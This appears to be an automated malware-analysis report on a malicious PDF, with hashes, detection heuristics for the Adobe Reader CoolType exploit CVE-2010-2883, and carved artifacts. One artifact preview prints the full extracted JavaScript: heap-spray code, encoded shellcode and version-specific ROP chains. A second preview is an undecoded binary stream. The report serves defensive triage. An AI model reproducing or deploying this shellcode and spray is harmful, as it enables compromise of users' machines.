PDF malware analysis — malicious · 589a3ab37764c1e5

MALICIOUS

PDF

296.3 KB First seen: 2026-06-19

MD5: 301b219189afd92c188719bb9b1944c5 SHA-1: 7ce40c8c24f61db25ed3db61280faecd7b249c4f SHA-256: 589a3ab37764c1e5fa2d95116ffda0c88277e276931a9054fd8a6aafde007a2d

226 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9997

Heuristics 9

Adobe Reader CoolType SING font exploit — CVE-2010-2883 critical CVE likely CVE_2010_2883

PDF embeds a TrueType/OpenType font with an actual SING table and pairs it with JavaScript heap-spray shellcode. This matches the public Adobe Reader CoolType SING exploit shape for CVE-2010-2883.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Encrypted PDF carries /JavaScript — payload hidden from static analysis high PDF_ENCRYPTED_WITH_JS

PDF declares /Encrypt and also references an executable trigger (/JavaScript). Document encryption hides the JavaScript body and stream contents from static scanners — combined with auto-execution indicators this is a known evasion pattern used to deliver weaponised JavaScript that the analyst cannot inspect without the decryption key.
XFA form low PDF_XFA

PDF uses XML Forms Architecture — can contain script logic
AcroForm button with action trigger low PDF_ACROFORM_BUTTON

PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.xfa.org/schema/xci/2.6/ In PDF document text
- http://www.xfa.org/schema/xfa-template/2.6/In PDF document text
- http://www.xfa.org/schema/xfa-locale-set/2.7/In PDF document text
- http://www.xfa.org/schema/xfa-locale-set/2.6/In PDF document text
- http://www.xfa.org/schema/xfa-form/2.8/In PDF document text
- http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 13

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0027_000.js`	pdf-javascript-stream	PDF /JS object 27 at offset 0x1C4F	4562 bytes
SHA-256: `291efbf5d137211c007665c22a034cfa1547dbb5e55c64dd50e5ad2ab7fae44a`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function memcopy(slide,times){ret = "";var i;for (i=0;i<times;i++){ret = ret + slide;}return ret;}var adobe_ver = (app.viewerVersion);var shellcode = unescape("%u8b64%u3035%u0000%u8b00%u0c76%u768b%u8b1c%u0846%u7e8b%u8b20%u8136%u6b3f%u6500%u7500%u81f0%u047f%u0072%u006e%ue775%uc689%u07e9%u0002%u5800%uec81%u0200%u0000%ue789%u7789%u8908%u1047%uec68%u0397%ue80c%u019b%u0000%u4789%u681c%u22f6%u7cb9%u8ee8%u0001%u8900%u2047%ua568%u0017%ue87c%u0181%u0000%u4789%u6824%u97fb%u0ffd%u74e8%u0001%u8900%u2847%u1668%ufa65%ue810%u0167%u0000%u4789%u682c%u791f%ue80a%u5ae8%u0001%u8900%u3047%u2568%uffb0%ue8c2%u014d%u0000%u4789%u6834%u08ac%u76da%u40e8%u0001%u8900%u3847%u9868%u8afe%ue80e%u0133%u0000%u4789%u683c%ub983%u78b5%u26e8%u0001%u8900%u4047%ue668%u8f17%ue87b%u0119%u0000%u4789%u6844%u9bad%udf7d%u0ce8%u0001%u8900%u4847%u77ff%uff10%u3457%uf631%u8d46%u6047%u5650%u57ff%u8348%ufff8%uf274%u003d%u0100%u7600%u89eb%u0447%u7789%uff60%u0477%u406a%u57ff%u891c%u5c47%u006a%u006a%u006a%u77ff%uff60%u3857%uf883%u74ff%u6a4b%u8d00%u705f%uff53%u0477%u77ff%uff5c%u6077%u57ff%u8b2c%u704f%ue983%u8b10%u5c47%u8140%ufd38%u7a46%u7585%u8109%u0478%u38b7%u91da%u0474%uece2%u1aeb%uc083%u8908%u1447%u8140%u2a38%u94f6%u7510%u8109%u0478%ud64a%u937f%u0e74%uece2%u77ff%uff5c%u2057%u850f%uff72%uffff%uc083%u8908%u1847%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6800%u0000%u4000%u77ff%uff10%u2457%u4789%u8b64%u1847%u472b%u8314%u08e8%u5f8b%u8014%u003b%u0874%u3b80%u743e%u8003%u3e33%u4843%uf883%u7500%u6aec%u8d00%u705f%u8b53%u185f%u5f2b%u8314%u08eb%uff53%u1477%u77ff%uff64%u3057%u77ff%uff64%u2857%u016a%u77ff%uff10%u3c57%u006a%u57ff%u6a44%u5000%u57ff%u5540%ue589%u8b57%u087d%uf389%u8b56%u3c73%u748b%u7833%ude01%u8b56%u2076%ude01%uc931%u4149%u01ad%u56d8%uf631%ube0f%u3810%u74d6%uc108%u0dce%ud601%ueb40%u39f1%u5ef7%ue575%u895a%u8bdd%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u5f5e%uc25d%u0004%uf4e8%ufffd%u73ff%u2e61%u7865%u0065");function spray_func(shellcode,nop_slide,count){var sz = 1024;var spray = memcopy(nop_slide,1024*15-(shellcode.length/2))+shellcode;var FirstEntry = memcopy(nop_slide,sz-18);var OtherEntry = memcopy(nop_slide,sz-11);var mem = new Array();for( i = 0; i < count; i++ ){if (i == 0){mem[i] = FirstEntry+spray;}else{mem[i] = OtherEntry+spray;}}} if( adobe_ver < 8 ) {}else if( adobe_ver <9 ) {rop8 = unescape("%u17f2%u4a82%u5000%u4a84%u630f%u4a80%u7ec9%u4a81%u203c%u4a82%u57bc%u4a80%u156a%u4a82%u54e0%u4a82%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2038%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2030%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u17f2%u4a82%u5004%u4a84%u630f%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0030%u0000%u597d%u4a80%u7ec9%u4a81%u5004%u4a84%ua649%u4a81%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0020%u0000%u597d%u4a80%u17f2%u4a82%u156a%u4a82%u00a0%u4a82%u7ec9%u4a81%u0034%u0000%u795a%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u000a%u0000%u597d%u4a80%u7ec9%u4a81%u2140%u4a82%u57bc%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u5000%u4a84%u4d4d");nop_slide8 = unescape("%u12c4%u4a80");spray_func(rop8 + shellcode,nop_slide8,2000);this.pageNum = 2;}else if( adobe_ver <10 ) {rop9 = unescape("%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u0000%u4a8a%u4d4d");nop_slide9 = unescape("%u1064%u4a80");spray_func(rop9 + shellcode,nop_slide9,2000);this.pageNum = 3;}
`javascript_obj0027_000_shellcode_00.bin`	pdf-js-shellcode	pdf-js-unescape-shellcode recovered from PDF /JS object 27 at offset 0x1C4F	576 bytes
SHA-256: `aa811054cb862ab1861a4072655d2935249456396f9f849b436c16ebf48ed7fd`
`javascript_obj0027_000_shellcode_01.bin`	pdf-js-shellcode	pdf-js-unescape-shellcode recovered from PDF /JS object 27 at offset 0x1C4F	336 bytes
SHA-256: `425a601d35b1b9bc8ca31f1a2bccbddef9eebf23003ff53291dbc63d6b516751`
`javascript_obj0027_000_shellcode_02.bin`	pdf-js-shellcode	pdf-js-unescape-shellcode recovered from PDF /JS object 27 at offset 0x1C4F	336 bytes
SHA-256: `ae79142230fb7211dc787d6b8ee62348526e57b6df6afe195bd50a6edb705be5`
`stream_001_off00000b76.js`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0xB76	1546 bytes
SHA-256: `672d461752be4a970c8e9721164ce074d252b55d09d46cc09259d2ce4fc09f7f`
`stream_002_off00000e2f.bin`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0xE2F	1650 bytes
SHA-256: `29cf1edfedd4f27f3c450646c5dc2510e6bf9e63eee1cd436ac517a465a2e1bf`
`stream_003_off0000119b.bin`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0x119B	2928 bytes
SHA-256: `0f910ffeec733940f6ba1ae41dc6770eab5d615c05bccc95197878b62c8dc45f`
`stream_005_off00001728.bin`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0x1728	56 bytes
SHA-256: `4a60a9864cdf7382475d51051a03fdc43b32c31eb508893ccfccece34957f9f1`
`stream_006_off000017ac.bin`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0x17AC	149 bytes
SHA-256: `fe122a09d8a0444608fdc5a6f4981a2dbd469f5bbfacb4bdd327c28ccc343e13`
`font_00_cff_off000041e8.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x41E8	1138 bytes
SHA-256: `ea8f409c7366ed46eeb553aa7b404f04641f482ba88463fbe253da60be5787e5`
`font_01_sfnt_off000048c7.bin`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x48C7	8084 bytes
SHA-256: `e31f8c8507e52f29008d946a00becde9f839e34cb108985ce66167bf881adafa`
`javascript_obj0029_000.js`	pdf-javascript-stream	PDF /JS object 29 at offset 0x3556	4562 bytes
SHA-256: `3efb5d1a5598d3ee7ae500b220714fb83e9eeb69e35549f069e78ee1d8f9410e`
Preview script First 1,000 lines of the extracted script �� t�v[s ��u� QV�'�RP6�W� �f �H�p�آ��R ��q i ŏ� ��ȗ�;� ��:X��5� ��u7u��F � ��^�: -u8��pcf�0� ��-�ty�� 4�� B\��m�? ��d�^[>��!s� @Ĝ�Վ�!�� m¿�� g 1��4uʱ� 9%m T)Ɖ� �(��ϒ , �m�p��lxw:> �X�c�M�G�H�<y�.% d�4�=+iǸǛ BkL��1�ZT��:͈ �&�� 8Hg��>ݴ � A� ��\��3��fN �9l� _�$I,O9��CS��v�� a �� \|ON i�Jtw��/Ս�/��%� ~j��Dѩ��.gS�� A�� Pw5 E��-n M] �-j��D��:C��ѳ �k��b�xנ�R\��o 栖L(�� y>�:�� +��R_fG��L��{��}� � � �ѥ� �r� F�� 4��Y �~ʓ�p@{p� ��̯�Y�2��z5 �k��1HU�e�^��w�� E y ��e o( v-޶F�� Є�O��(`jJ Rk �,� דqM[B �S�d��W�F�O��2P �Bd�@R ߜ �C�D�A{Gg�1��I5`v��Zb��{W؈k�k�tG�L?�B�I�\�Lt}B Etm1 )ş@�� ℁<y��L�4̹�s EId-�% �;۰4ɛ�N�&�#� �� N�o�� _{��KX l.�sƗ)6 C��W � ��"�� 2� ��W�Z ��9L�}��?C�³�S$EZ�� ^-�� =� f�u � � �߭�Hl� �4 �� =��'��#[�gE�� Q��y�%pσ'�# �y�%=�j��ޜ)A �˘6� ��ak}�B �)d��BК � �3g3�"��u w!�HW� ��I��r�MdR�x�7"� : �2K��`��J� �� J �YO �6� ��:0�3�@(�ӑ�ht�h4�Z L'Μ�� '��~sW7�� +�� .� � �"�Ա�� i�c��p ~I�c+ t�-�bP��R� �I�d�l< � q_tV��C9}w<�.��B�� i��I[�v��!��XX��N��$� ��(��7:� (��]%��S`�D��p� �hbu� ��q�� (i�g�� q�o�\d�k�� z�so�M� ��7O�^l�V �X ��v� � � �j��^ �[�(yϿ_M�m��%�D� 'A��7�6��я��!��l9�V��if�t� �m`\|s��7�[�� j)xhz�'ܺ �"� {�� %�ѿbgTb��k��W ��fo�)E̖� �� [E�؃� �M�z@� ��J��7[�"� >�q��TW�<�oE�k� ��h4� �C�2� O��x-�ɚ�yH��wGї�Or5��N��q�ͭ �c5m�yHp��?��YOU �� ĩ��4r��e�+P �U@��vZH� �jb�H ��vF� � �)j7ěTP�a&�e��c ��n��j` ,��]Z}� N�b $�@OW �3zWϴ�� ? y��{� �q�A� �3А8�c < ��D��[=XJ��%b]_� ( � PA�� T��`�Q��a��t�N �� rͻ ��6{�Εg�-�B�7 ��.S"�"W-pM � Ki�� d � !g s) �? �y��Zo\ .dN (nA��v�T ��FRwnE �l ��O��Ë�[� {�qߗ7R��S�# d:P�7�Ik}�E��R��c�x� ] X �� ^EmH)TEdj� �2�ng� bQୃ� � ?7��= � OΞ��y��`h�T�H�{�� 2XYA}�ټ��0 a��A��_n� �� 8 C�`ߘ �( � ��X�B13N$��BFG6k��@��@oGdL�� K�O��l> Z�3. ��T5��: ou� ٓ��p2��+S� Ǫ��AI"�V0 ��; � � 8 j�mD���� e:��.uѹ8��F� �f& \|�^� �� #�7T[�>� ��s� V��6ݍt2x�� =� ��lx�(� 2�� pE�� IRṏH� �[�!�Mܬ� gE � o7�#�v�Q�P`� J��D�"� ��eD�7&o����x)l��4�f�zjЯ�!��\|�C5 l� \j�W�$Q-�� }g��$�l��D��ᆝ $\kYc � �� l�g��`�� M $JB�m��:k ��o��Fmh� �f� ^�?��` m.� 4�vw� �-�u �%( ��'=��>�2W�Ns � _��g`4�w�)E�9�Ƒ Jj��&�w ��#3n�˨��S�H^l�}� �6�� (��2� � E�Uk1 �= " 麖�l �� K h��h3�>�˲�ٙ� qx��˵̯�� 8��G)�V�o�?�7ŧ� Է�6Y�9�$Z`��_8�/�Ҿ?K�u^��`�ǫ��@��B��A]��5��x��<� �� uŭ� �� W�� R�/ t ��zq�\|M \wf ��xh dX A�Oq�� tUݺ ��AB��v=�w�)�t�z�±�� ֳ�nx��kV 8��Zn I�� /l� "-�Z�0�n��v�<�L� �� 򖸭�dj�\z� ��v:D݋s�xy�\|��X" , ��f(�S��! � ?=7�5/��h�� #�g��"�� :��~d Lx�5� +� ��K6XϹ]�]�Ƥ2�M �o�N�i L 4� !F��h6 �p�j��0?J .�� LH��U� e2 ��Y�� X��^�u��{S��ş�� ^ �^X��h��ol�W�� ��Y�7��Nv� �Xȓ��G� �ݜ� �@+$ ��)��1B�I�h��B �'�. d�ͰWY �t��S;��svY7Qw�� vjd�_ ��BM�>� j�kP�yo!��X�_�#�-Jo �qKz� @ �� 'j��8�Zq�T�C;qQ�1��6O~{&��o<t�b� �pr��m_� �� (\GH �D]b�ľ,4� Z �x�{��:_82��HL4��? cP&�){I�$� ��u�m�� ́��zz � r� l5 t��sS�m�Iv��9� Z��! �Z%V �� S�Uփ�R� t�j\|� �Z�� k\|�� '��G/{��ۯ� � )��~:�� X ~��;��6쒔sy NO�@z"B��O �/�ԜV�� \�ZV� J& ��w8��N�0r U� EX��1� ��Y'�g�{s�� S��g, mǫ\�� x �Ś[H��'Sn ¥� _+? S�_^2�[c��s � ��2 ��ڣF" ��]��f�ܺI � QҠk�/�Ł�� 8� K Zz6Z � ��.�� y�lX�'U?+� ��LI>��}��; #%]ܞd&JPX�w ~�=M�8S_�.lV�s��c S��,9��"�\| w�y��L�Vi3r+�R ��:Aӻ��젶Tȶ��^��W �L�浯;8L<-� ��y5W��ƴ �@ �ۗ� ˝_@�z�!��; Ŵ)��Emv1lr��m �ʌ ��懓�C�#��h 2TUW� �� @di$tt�!Z%J�� F��GO�F]�S<s��[kt�=��r)��6g�}\a[zmD'�<�U� �D� � �77 �� t{� ɘ�{.yd�� ~5��=��/2��\|B�/] �z�h��\|!k=)�ʛ��)00 'Ԫ��N�ዻ� �_+�� ˂��M ̐�ō �� R$�ӈ�B"$n �.��Ρ��d��Dܷ�,�� h T�$��spF$�,�B�T\| �)\;!� �� hB�R c� �: ѱ�gҲ �҅�tޞS��M#��N��Ř��yR�Þ�`��<{?� )�� H�� G`1��3�90�@+Ԩ�� W�$Q ��4 �vX}Єks�҈��a] (H ~ � �dY�S�pX��Tk �g��.� �O �S]e�}��M\��j�� \��~-�?N�~!Bk�x�<Hg Q2 ��K< T��\|��0� a��x�=Q� Q��:�WZ� 8u�%�? )�� /+� v ��%��%��l!�`o\ ��&�؈�.�K'L� �U� . � �� xf0��xB��ƙP�?�� [��1?�(��@ �Rƙ�W��$�� p ��-RGD J�O��(bnZa�z</Zw&1�^x�`�b3�Pn��q�c^�L�~��ٚ r � �� F S�`9�&��ڻ��+�0&��z�Ԝ�h ` Z-�� ; :� ��O+Ëp`��3�� G9�3 ��cc�A��r �ر?;��d� d��w�&GĈ�" }�3��bSEP�̜a��; #9��<p�ѵ�h��2!��:�3o�:��.a��2K "g��s@�~V�B��8K{FOK r�A��,�;e{� d 0,ƶ6 0BǦ�X�� t�� i
`font_00_cff_off0000521b.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x521B	1138 bytes
SHA-256: `cf4a9aaa37300558115c3e99be8e93710443c3c5320de5ebb95742f045fc87e3`

Open this report in the interactive analyzer, or submit your own file for analysis.